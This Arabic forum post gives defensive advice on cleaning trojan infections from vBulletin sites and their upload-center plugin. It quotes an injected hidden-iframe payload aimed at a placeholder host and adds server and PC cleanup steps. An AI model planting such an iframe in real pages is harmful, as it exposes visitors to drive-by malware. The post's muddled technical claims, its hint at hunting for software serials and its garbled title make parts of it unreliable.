ط¹ظ„ط§ظ‚ط© ط§ظ„ظ€ trojan ظ…ط¹ ظ…ط±ظƒط² ط§ظ„طھط*ظ…ظٹظ„ ظˆط·ط±ظ‚ ط§ظ„طھط®ظ„طµ ظ…ظ†ظ‡ط§ ط¨ط*ط« ظ„ظ…ط¯ط© 8 ط£ظٹط§ظ…


السلآم عليكم ورحمة الله وبركـاتـة

مساكم الله بالخير .. وصبحكم الله بالرضاء والعافيه

في بحثي الأول عن حماية مركز التحميل ... ولله الحمد وفقني الله في أن أكون سبب بأن يفض فوه أحد المكتفشفين بالثغره ... وتساعد مع إستاذي أحمـد ... في إغلاقها وجزآه الله خيراً

ويوفقنا أجمعين في ذآلك ولكن هذه المره أحببت أن أكون عون في إيضـاح لماذا الـ trojan يرتبط مع مركز تحميل ديزاد باتنة ؟

هل تعلم عزيزي العضو والزائر بأن الدودة يوجد به نوعاً يسمى Warm يقرأ معلومات موقعك عن طريق برنامج الـ ftp الخاص بك

وهو ماكان سبب في هذه المصيبه العضمى في مواقعنـآ ... إليك عزيزي أثناء تواجدي في نظام التذاكر

في عملي وإذا بعميل يضع تذكره ويقول التالي



دخلنا موقعه لنطلع على الجديد رغم أنني وقبل ثلاث ايام عملت له ترقية upgrade
وش رايكم نروح سوا نشوف وش لقيت ؟


أنا الآن مستعد لحلها بـ 10 ثواني ولكن مابعد حل المشكله ؟؟؟؟
نمشي حبه حبه عشان توصل لك الفكـره بالشكل الصحيح ...

نذهب لمجلد index.php داخل مجلد vb بوريك سورس معين للفايروس

رمز PHP:
<code style="white-space:nowrap"> <code> <iframe src=”http://xxxxxxxxxx.com/?click=xxxxxxx” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
</code> </code>


حيث أن xxxx تعني عدة قيم لعدة فايروسات مجرد أننني أقوم .. بتغيير باسورد العميل
ومن ثم أقوم بتبديل عدة ملفات منها
index.php
tag.php
usercp.php
admincp/index.php

إسألني سؤآل لماذا أصيبت هذه الملفات ؟؟؟
لأن لوحة تحكم العضو فيها خانة لإضافة صورة خاصه فيه الـ inde.php أساسي بالموقع
الـ admincp/index.php
لأن صاحب الموقع يدخل ويضيف منتج pluginات حسب رغبتـه
لذالك غالباً ماتصاب طيب لماذا تصـآب ؟؟؟

انا غيرت باسورده وغيرت الملفات .. وإلى الآن لم يأتي ويقول فيه فايروسات بالمنتدى forum حقي
لأن الدودة الموضحه أعلاه .. فقدت السيطره .. بموقعه لأنني غيرت الباسورد ..
إذا اين الدودة تقع ؟؟؟ بجهـازه لا محاله أتمنى وصلت لكم الفكره بالشكل الصحيح ..

الآن الكل بيقول ماجبت شيء جديد ياعبدالحميد .. سبق وأن شرح طريقة هذا الشيء ومن قبل عدة أعضاء
مالجديد في ذآلك ؟؟؟؟

ركـز معـي شوي وفكر زين ... أصيب الملف usercp.php + admincp/index.php لماذا ؟
لوجود خـآنـة ترفع صور أو منتج pluginات أو ملفات ... تقبل الرفع من وإلى الموقع ...

طيب مركز التحميل منتج plugin مهتم بخاصية الرفع ... فقط فيجب حمياتـه أكثر وأكثر ولا يصاب لوحده مركز التحميل أبداً لماذا .. لوجود كود code ممتاز جداً بملف up/upload.php فهو المتكفل بفحص الملف أثناء رفعه

عندما تطبـق ماشرح طريقةته سابقاً بخصوص كود code ملف الهتاكس بكذا أنتهيت من مشكلة الشلات

يتبقى لدينا الآن .. جهازك كيف نقوم بحمايته من التروجان ؟؟؟ لكي لا يتم الأتصال بموقعك ويقوم بعمل مهزلة وجيش من التروجانات .. ؟؟؟؟

أولاً لنقرأ سوياً عنهـآ ..


أعجبني الموضوع أثناء بحثي لعملية التروجان

وهذا موضوع يختص بآلية عمل التروجان


الموضوع الأول كلامه صحيح ... ولكن كيف تمت العملية تعال اقولك

هو يستخدم برنامج أفيراً وعلى حد علمي في ذالك الموضوع .. كيف تمت

هو وضع صوره وليكن اسمها dzbatna وجهازه والصوره غير مصابات ؟؟؟

ولكن من تصفح الموضوع ... ولديه صوره نفس الأسم ..dzbatna

قرأهـآ التروجان بجهازه يفكر انها تطلب عملية منه

لذالك البعض أختلفت ضده بعض الأرآء ويتهم بعض الصور بوجود فايروس .. لماذا تمت العملية بهذا الشكل لأدآء البرنامج بشكل صعيف ... وليس تماماً أو أن قاعدة البيانات للبرنامج غير محدث

إليـك عزيزي المثل الآخر لمشكلة أخرى ..عند وجود تروجان بموقع ديزاد باتنة ..وليكن أسمه dzbatna
ودخلت للمره الأولى موقع ديزاد باتنة ... وقام بحجبه برنامج كاسبر سكاي أنترنت سيكيورتي

بالشكل التالي


أستطيع فتح الموقع عن طريق الكاسبر سكاي بوضع علامة الحجب للتروجان ولكن فتح الموقع
ولكـن وضعت هذا المثل لتوضيـح نقطة معيـــنه ...

أنا دخلت .. موقع ديزاد باتنة ووجدت تروجان وكان اسمه dzbatna ودخلت موقع dzbatna.com وتم حجبي ؟
لمذا لوجود صورة أسمها dzbatna وليس تروجان ففكر التروجان أنها تطلبه بان يقوم بعمل معين

فهمت الفكره الآن ؟؟؟ لذالك يجب أن تتخذ الحيطه والحذر من هالعمليات ... المشبوهه والصعب جداً
إيجاد حلاً لها ببساطه لان الجميع ....

ليس لديه الأستعداد لشراء برنامج حماية وليس لديسه الأستعداد لتنظيف جهـازه
والكثير بل الأغلبيـة ... ليس لديه الأستعداد .. بان يقوم بعمليات تهتم لجهازه كل فترة 4 أشهر أو ست اشهر أطلع لأقرب محل وأحطه عند أطرف عامل يقوم بالفورمات .. وأنتهينا ...

طيب إلى متى وأنت تطالب بوجود حلول وانت مهمل بهذا الشكـل ؟؟؟ إليك عزيزي دراسه صغيره مقمدمة مني لتوضيح أكثر للحلول بمركز التحميـل

شرح طريقة حل مشكلة التروجان بالمواقع كعموم ومركز التحميل كخصوص ...

كيف حدث ذالك ؟؟؟

إذا كنت تعتقد بان جهازك مخترق فليس صحيحاً 100% ولكن لانبعد الشك في ذآلك عليك الحرص من الجهتين لتفادي الأثنتين .

الأستضـافة ؟؟؟

إحتمال آخر بان السيرفر SERVER قد يصيب ولكن يوجد أكذوبه صغيره منتشره بانه إذا اصيب موقع واحد أصيبت جميع المواقع على السيرفر SERVER ورأيتها أثناء بحثي وليس لدي الوقت الكافي بأن اقوم بالتسجيل لأيضاح ..
الحقيقه فاكتفي بوضعها بديزاد باتنة لتعم بشكل أكبر وحبه حبه لتنتشر أكثـر

إليك الحل عزيزي صاحب السيرفر SERVER .. إذا كنت عميل أهدي هذه الجزئية لمستضيفك

أولاً تركيب install حماية على السيرفر SERVER ويوجد برنامج مجاني free بالسيرفر SERVER ...
ثانياً عمل التالي في حال وجود تروجان او فايروس

أولاً قم بإنشاء فولدر بأسم dzbatna او اي اسم ترغبه في مجلد الـ root وقم بإعطاءه الترخيص 711
ومن ثم قم بتنفيذ الأمـر التالي

رمز Code:
clamscan -r --move=/root/dzbatna/home

في أردت عمل ذالك على موقع واحد فقط

رمز Code:
clamscan -r --move=/root/dzbatna /home/xxxxx

مع مراعآة الـ xxxx تغييره الى يوزر الموقع المرآد ..


أنت ( العميل ) صاحب الموقع ؟؟؟؟

كما ذكرت لك بالسابق بأن الدودة Warm تقوم بالأتصال عبر برنامج الـftp الخاص بك .. لذالك إليك الحل
عزيزي ولن أبخل عليكم بخصوصيتي فهي هديه إليك ...

قم بتحميل الملف التالي



ومن ثم قم بعمل التالي

اولا يجب تحميل البرنامج من احدى المواقع الثلاثة





ثانيا يرجى تحميل البرنامج




ثالثا قبل البدء بتشغيل الاداة يرجى اغلاق جميع البرامج و النوافذ

رابعا يرجى اغلاق و ايقاف برنامج مضاد الفيروسات

خامسا قم بتشغيل الاداة و عدم تشغيل برنامج آخر

قم بالضغط على تشغيل run اذا ظهرت لك هذه الرسالة

سوف تظهر لك هذه الشاشة و التي تعني بان الاداة قد بدأت في العمل



اضغط على واحد و التي تعني موافق او عل كلمة yes لاصدار حديث من الاداة



سوف تقوم الاداة بأخذ نسخة احتياطية للنظام



تقوم الاداة بعمل مسح للجهاز


مراحل المسح و تنظيف الجهاز قد تأخذ وقت كبير


عدد المراحل هو 41 مرحلة


سوف يقوم بعد ذلك باعادة تشغيل الجهاز لا تقوم باي شيء فقط راقب

يقوم الان بانشاء تقرير


مسار التقرير هو C:\ComboFix.txt

كما هو موضوح في الصورة


صورة عن التقرير



إليك عزيزي أنت أيضاً ؟؟؟؟

يمكن بأنك قد لا تستخدم الـ ftp ولكن تستخدم الـ cpanel لرفع الملفات
أو مركز التحميل .. فهو كذالك يقوم .. بنقل العدوى منك وإليك

كيف أعـالج الوضـع ؟؟؟

سيتم الشرح طريقة .. لمركز التحميل فقـط فنحن في قسم مختـص لذالك يمكنك تطبيق الأمر لأي سكربت بأستبدال الملفات ... ماعداً ملف التنصيب setup كمثال ( الكونفق )

ومن وجهة نظري الشخصيه ... إذا كنت تعرف معلومات القاعده والكونفق غير مشفر
أرفع نسخه أرخى غير الموجوده وقم بحذف السابقه ... وقم برفع نسخه .. جديده مع هاك productات
فأبو عمر غير مقصر في ذالك

وضع المعلومات بالكونفق وأكمل مسيرتك بالموقع ولكن بعمل السابق ذكره أولاً ...
لنشرح طريقة كيف يتم التخلص من التروجانات بمركز التحميل ؟؟؟

طبعاً سنعمل كما عملنا لأي سكربت أولاً نقوم بإيقاف السكربت .. وتغيير مساره إلى up1
كمثال .. طبيعاً ويبقى المجلد الرئيسي up داخله مجلد .. وضع به ماتشاء أما تحت التطوير أو اي شيء تريد قوله لزوارك

ومن ثم حذف جميع ملفات المركز عدا ملف التنصيب setup كونفق وبإمكانك وضع المعلومات من خلال sql بالـ cpanel لست بحاجه له ماسه تستطيع استبدال كذالك المعلومات بأخرى عن طريق نسخ القاعده .. بقاعده جديده ...

أو أنك تقوم بإضافة يوزر جديد للقاعده أنتبه عزيزي لا تقوم بحذف مجلد uploads فهو أهم مايوجد بالملفات نقوم برفعه للجهـاز ... عن طريق الـ cpanel ومن ثم فحصه عن طريق برنامج الحماية ... ومن وجهة نظري برنامج كاسبر سكاي أنتي فايروس فهو الأقوى
عبر موقع توب تن لبرامج الحمايه حائز على المركز الأول لـ 5 سنوات
http://internet-security-suite-revie...enreviews.com/

ولكن لهذه السنه يخفق بالمرتبه الثالثه ولكن يبقى الأقوى من وجهة نظري .. لتمكنه من حذف التروجانات بالموقع ومن حقل تجربتي .. هذه ...

ويوجد نسخـة تيريال يمكن أستخدامها .... في حال عدم توفر الماده لديك لشراء مثل هذه البرامج
ويمكن البحث عن سيريلات لبعض البرامج التي تثق بها لحذف التروجانات ..

وبعدها نقوم بإعادة .. الملف والمركز موجود ومن ثم نعود لإعادة المركز على المسار up
ونقوم بحذف السابق .. كما تريد .. وترغب .. قم بعمله ..

يتبقى لدينا أحبائي .. جزئيـة صغيره أحببت أن اضعها .. بموضوعي البسيط
في حال تريد التأكد من خلو موقعك .. من التروجانات ولكن ارشفتك تعكس ماهو مذكور ..
من خلال هذه الصفحه ..
http://www.google.com/safebrowsing/d...//stop-net.net

مع مراعآة إستبدال رابط الشركة stop-net.net بموقعك
وتظهر لك النتائج البعض بعد ساعه يقولك ماتغير شي ؟؟؟؟ لاحظ عزيزي اسفل الصفحه على الخانه اليسرى ماذا دون من قبل قوقل google ؟؟؟

اقتباس
Updated 4 hours ago


مسألة وقت أحبائي والأمور سوف تتعدل
لن تتعدى 48 ساعه كحد أقصى لأعادة موقعك آمن دون شوائب من قبل قوقل google ...
الآن نأتي لأخر نقطه وهي بعض المعلومات لبعض الفايروسات والتروجانات ..
http://www.viruslist.com/en/viruses/encyclopedia

إقرأ ياعزيزي عن التروجانات لبعض الوقت فالمصلحه لك وليست لي



لتتمكن مستقبلاً من حماية نفسك دون الرجوع لأي أحد ...

أخواني .. هذا البحث رقم (2) لي في هذا السكربت إنتظروني قريباً بالبحث رقم (3)
للإشادة في بعض مايبلبل به العذال ضد هذا السكربت
فلم أضع هذا البحث إلا لإعجابي به ...وتمكنه من عدة مواصفات رآقت لي ولمعظم المستخدمين
إذا انت ترآ بانه غير ذآلك ياعزيزي لست مجبراً بإستخدامه .. لما رأيت من بعض الردود ضدي في أحد المواضيع ... فهم يركزون فقط على اشياء لا تستحق الذكر ويتركون الهدف المرآد

أخوكم عبدالحميد الحربي
إهداء للجميع وعلى رأسهم مستخدمي هذا السكربت

ملحوظة نسيتها وجل من لايسهو
يجب قبل تنفيذ اي عملية تغيير باسورد الـ ftp
لعدم الأتصال المباشر اثناء العملية وتصبح لعبه وليست حلاً للمشكلة
أو حذف برنامج الـ ftp لعدم توفر اتصال مباشر بين موقعك والدودة
وإعادة تنصيب setupه والدخول بباسورد جديد









©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى©